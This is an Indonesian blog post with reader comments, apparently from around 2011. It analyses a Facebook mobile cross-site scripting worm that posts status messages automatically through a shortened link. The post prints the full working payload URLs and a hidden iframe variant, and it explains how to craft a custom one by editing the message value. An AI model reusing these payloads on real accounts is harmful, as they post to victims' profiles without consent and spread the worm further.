[Hacking]Bahaya Url pendek FB
Barusan saya melihat status orang yang hampir sama. Awalnya saya kira ini memanfaatkan aplikasi facebook. Setelah dikopi paste dengan wget diterminal. Beginilah hasilnya :
http://tinyurl.com/sampahh berubah menjadi :
http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=’%3Cscript%3Ewindow.onload=function()document.forms%5B0%5D.message.value=’jangan%20salahin%20w%20kalo%20lo%20bakal%20ngakak%20ngeliat%20ni%20orang%20:D%20http://tinyurl.com/sampahh’;document.forms%5B0%5D.submit();%3C/script%3E
Huh …tinyurl-nya berfungsi untuk menyembunyikan javascriptnya 😦
kalau kita decode jadilah seperti ini
http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='jangan salahin w kalo lo bakal ngakak ngeliat ni orang :D http://tinyurl.com/sampahh';document.forms[0].submit();}</script>
Dasar orang isenk 😦 Bukan virus, tapi ya mengubah satus kita sesuai denan message value di atas.
Update : ini juga
http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='ini fotoku wkt lg ML http://tinyurl.com/rahasiapribadiku';document.forms[0].submit();}</script>
untuk membuat ini cukup mudah
cukup kopi link diatas kemudian ganti bagian message.value.
contoh :
ini testing dari mamakey http://tinyurl.com/mamakey
maka tertulis :
http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload%3Dfunction(){document.forms[0].message.value%3D’ini testing dari mamakey %3AD http%3A%2F%2Ftinyurl.com%2Fmamakey’%3Bdocument.forms[0].submit()%3B}<%2Fscript>’
Silahkan saja klik link diatas 😀 dan hapus pada wall anda
update lagi :
sekarang mereka tidak memakai tinyURL tapi memakai IFRAME untuk melakukan scripting.. huh jahat. Ketemu scriptnya disini :
<iframe id="CrazyDaVinci" src="http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=%27%3Cscript%3Ewindow.onload=function%28%29%7Bdocument.forms%5B0%5D.message.value=%27Masih ada orang yg mau terkenal dan kaya raya dengan memuja setan, termasuk salah satu grup band terkenal di Indonesia ckckckck.... baca selengkapnya di http://tinyurl.com/4fqudco %21%21%21%27;document.forms%5B0%5D.submit%28%29;%7D%3C/script%3E" style="display: none;"></iframe>
terima kasih Fuad for pointing me 🙂
Thanks ya Mbak, mohon ijin info ke yg lain…
itulah tehnologi , kalau jatuh ketangan yang salah, atau orang yang gak bertanggung jawab beginilah jadinya…..tinggal kitanya aja yang perlu ati ati sekarang, jangan gampang tergoda dengan hal hal yg menarik,,,salam kenal.
Thanks infonya ya. Mohon ijin aku share di fb ya
aku masih pemula mbak, tp gak apa biar nambah2 wwsn aj,
thank’s to all.
thanks mbak sangat berguna infonya, sudah tak delete smua di profilku
info yg menarik………………………….
Saya dapat 5 url yang kayak gini mbak 😀
sama barusan aku juga kejebak tepaksa ganti pass trus hapus tu spam
sama barusan aku juga kena jebak
pengetahuan baru nih buat saya. Makasih! 🙂
ahai, mau tanya it berakibt fatal buat fb+email tdk ya, mhn pencerahan nya.
thanks ilmunya … ta pikir ulah iseng sapa neee
wkwkkwkwk….. aku cuga kejebak…. pengalaman.com
wah penjelasan dari seorang yang ahli nih,, sampe capture lewat unix ya.. ^___^
Nice info Gan…
mbak makasih infonya…saya juga liat temen saya kaya begeto,,,,mohon ijin share…makasih
wah, makasih mbak, ternyata itu toh, he6
besok kita kampanye pake model kayak gini. 😀
Wah..!! Up to date nih infonya…
Nice info, sangat bermanfaat gan…
emmh.
makasih sist infonya.
salam.
makasih.. makasih … infonya.. 🙂
saya adalah orang yang nggak gampang trjebak… coz udah ke enduz dahulu… thanks sharenya… 😆
Ada tipe baru bu pake javascript, http://lupuszone.webs.com/samsons.html. sepertinya harus segera memberitahu facebook akan kelemahan di sistus merek.
Kalau lihat di bagian head ada kode berikut
block saja app ini~
siip…
http://2yku84yu.wordpress.com/2011/03/29/wordpress-vs-blogger/
Bugs FB? heuheu
bu kalau pake Iframe hasilnya beda kah?
Bug facebook ada disini promt-feed.php itu yg dijadikan tempat msuk cracker :hehe
parah banget yah lobang security di fb nih….
untung saya udah jarang pake Facebook…. hehehe.. 🙂
mantap kak
Sepertinya twitter juga kena masalah serupa belakangan ini…
tapi klo pakai cara itu, penyebarannya cuma sekali, tidak dapat berkali-kali
hm pantes aku agak aneh liatnya
makasih
letak/dampak bahayanya apa ya? masih gak ngerti… mohon bantuannya… thx
wah makasih yah infonya… pantesan kemaren di beranda banyak stat2 kek gini…
Thanx a lot informasinya.. saya sempat kawatir karena saya juga kena.. terus terang saya kurang mengerti maksud script diatas, tapi saya cukup berterima kasih karena telah diberitahu inti maksud sebernarnya
+1
memang harus hati2 dengan teknik2 black hat yg terbaru
ijin share di fb saya ya mbak
blog saya ini di hack orang… ada yg tau solusinya…????
Minta saja email dan paswordnya gan 😀
hmm makin banyak yg make dong script menjebak ini… ada baiknya scriptnya tidak usah ditampilkan cukup deskripsinya saja…
mohon ijin utk copy paste.. salam.
ooow, jadi begitu toh triknya…
harus lebih hati2 buka shortened url
Efek nya apa cuma status itu juga muncul sebagai status kita gan, ada kemungkinan pencurian password fb kita ngggak?
wuih, banyak juga tuh yang make scrip tih, ijin share untuk info kawan laen
Emmm…ada2 aja tp boleh lah…. iseng lewat script2 nakal…
code of evil….and plenty more…:)
Bagaimana antisipasinya? apa ngak boleh buka FB di Seluler? ato harus ganti password? maaf sy baru nih…
trims
alhamdulillah dapat penjelasan dari mas, jadi bisa membantu teman-teman yang menjadi korban,..
nice share sist, kalau ane ketemu FB chat yang URL nya aneh2 langsung ane click CLOSE. Nggak ane buka2 lagi…
setuju, hati2 kalau click pada link yg tidak jelas,
kalau pakai IFRAME, jadinya seperti apa?
informasinya sangat membantu, semoga dengan info ini teman-teman yang lain bisa terhindar dari kerugian karena metode tersebut.